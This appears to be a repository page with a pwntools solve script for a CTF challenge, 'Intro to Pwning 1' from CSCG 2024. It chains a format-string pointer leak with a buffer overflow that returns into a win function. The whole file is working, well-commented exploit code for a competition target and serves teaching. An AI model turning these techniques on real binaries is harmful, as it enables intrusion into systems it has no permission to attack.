cscg24-pwn

CSCG 2024 Challenge 'Intro to Pwning 1'
git clone https://git.sinitax.com/sinitax/cscg24-pwn

solve.py (1010B)


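from pwn import *
import os

# Challenge-specific values, all carried over from the original script.
# The three offsets are relative to the PIE base recovered from the leak.
LEAK_INDEX = 41        # index of the "%p" output the base is derived from
BASE_OFFSET = 2537     # distance of that leaked pointer from the PIE base
WIN_OFFSET = 0x9EC     # the win function
RET_OFFSET = 0x0B2D    # a plain `ret`, used once to re-align the stack (see main)
NAME_FMT_COUNT = 50    # number of "%p " specifiers sent as the witch name
PADDING_LEN = 251      # filler after the spell; presumably reaches the saved
                       # return address, given the two addresses sent after it


def connect():
    """Open the target connection and return the pwntools tube.

    With `debug` set through pwntools' command-line `args`, a local ncat on
    port 1024 is used; otherwise the first positional argument is the remote
    instance ID. Exits with status 1 when the ID is missing.
    """
    # NOTE(review): pwntools only collects UPPERCASE argv tokens into `args`
    # (e.g. `python solve.py DEBUG`); confirm `args.debug` is ever truthy here.
    if args.debug:
        return process("ncat localhost 1024".split())
    if len(sys.argv) < 2:
        # Use the real script name; the old message hard-coded "exploit.py".
        print("USAGE: {} <ID>".format(sys.argv[0]))
        sys.exit(1)
    target = "ncat --ssl {}-1024-intro-pwn-1.challenge.cscg.live 1337".format(
        sys.argv[1])
    return process(target.split())


def leak_base(p):
    """Return the PIE base derived from the format-string leak.

    Sends NAME_FMT_COUNT "%p " specifiers as the witch name, prints every
    returned token with its index (useful for re-deriving LEAK_INDEX if the
    binary changes) and converts token LEAK_INDEX to an integer. Exits with
    status 1 when that token is missing or is not a hex pointer (e.g. "(nil)")
    instead of dying with a bare IndexError/ValueError.
    """
    p.recvuntil(b"Enter your witch name:")
    p.sendline(b"%p " * NAME_FMT_COUNT)
    leaked = p.recvuntil(b"enter your magic spell:")
    # Split on single spaces on purpose: LEAK_INDEX was derived with this
    # exact tokenisation, and .split() (which collapses whitespace) would
    # shift it. errors="replace" keeps stray non-UTF-8 bytes from aborting
    # the run; the "%p" tokens themselves are plain ASCII.
    leak_vals = leaked.decode(errors="replace").split(" ")
    for i, v in enumerate(leak_vals):
        print(i, "->", v)
    try:
        leak = int(leak_vals[LEAK_INDEX], 16)
    except (IndexError, ValueError):
        print("leak token {} missing or not a pointer: {!r}".format(
            LEAK_INDEX, leak_vals[LEAK_INDEX:LEAK_INDEX + 1]))
        sys.exit(1)
    return leak - BASE_OFFSET


def main():
    """Connect, recover the base from the leak and send the spell payload."""
    p = connect()
    base = leak_base(p)
    win = base + WIN_OFFSET
    extra_ret = base + RET_OFFSET

    print("RERET:", hex(extra_ret))
    print("WIN:", hex(win))

    # Why return through an extra `ret` before win?
    # A `movaps xmmword ptr` reached after the return requires rsp to be
    # 16-byte aligned. Each `ret` pops 8 bytes, so going through one bare
    # `ret` first moves rsp by 8 and restores the alignment.
    # All payload pieces are bytes so nothing depends on pwntools' str
    # encoding; the content is byte-identical to the original.
    p.send(b"Expelliarmus\x00" + b"A" * PADDING_LEN)
    p.send(p64(extra_ret))
    p.send(p64(win))
    p.send(b"\n")  # terminates the input line; kept from the original
    p.interactive()


if __name__ == "__main__":
    main()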